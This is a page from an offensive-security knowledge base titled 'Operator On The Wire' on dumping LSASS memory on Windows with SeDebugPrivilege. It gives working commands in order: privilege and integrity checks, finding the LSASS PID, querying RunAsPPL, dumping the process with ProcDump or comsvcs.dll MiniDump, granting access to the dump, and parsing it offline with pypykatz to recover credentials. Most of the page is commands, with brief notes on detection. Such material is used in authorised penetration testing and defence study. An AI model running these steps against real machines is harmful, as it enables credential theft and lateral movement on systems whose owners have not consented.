Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Privileges / SeDebugPrivilege

LSASS Dumping

LSASS dumping with SeDebugPrivilege is credential extraction. It can lead to lateral movement or local escalation if recovered credentials are reusable.

This path is noisy on monitored endpoints. PPL, Credential Guard, EDR, and dump policy can block or detect it.

When enumerating LSASS dumping opportunities, try to identify:

  • SeDebugPrivilege in the current token
  • High-integrity context
  • LSASS PID
  • LSASS protection state
  • Writable dump path
  • Offline parsing path

Enumeration

Check privilege and integrity:

whoami /priv
whoami /groups | findstr /i "Mandatory"

Find LSASS:

tasklist /fi "imagename eq lsass.exe"

Check PPL state:

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL

Interesting findings include:

  • SeDebugPrivilege present
  • LSASS is not protected as PPL
  • Dump file can be written to disk
  • Endpoint controls do not block process access

Once confirmed, dump the process and parse offline.

Exploit

Dump LSASS with ProcDump:

procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp

Built-in alternative using comsvcs.dll:

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\Windows\Temp\lsass.dmp full

Grant access to the dump if needed:

icacls C:\Windows\Temp\lsass.dmp /grant %USERNAME%:F

Parse offline:

pypykatz lsa minidump lsass.dmp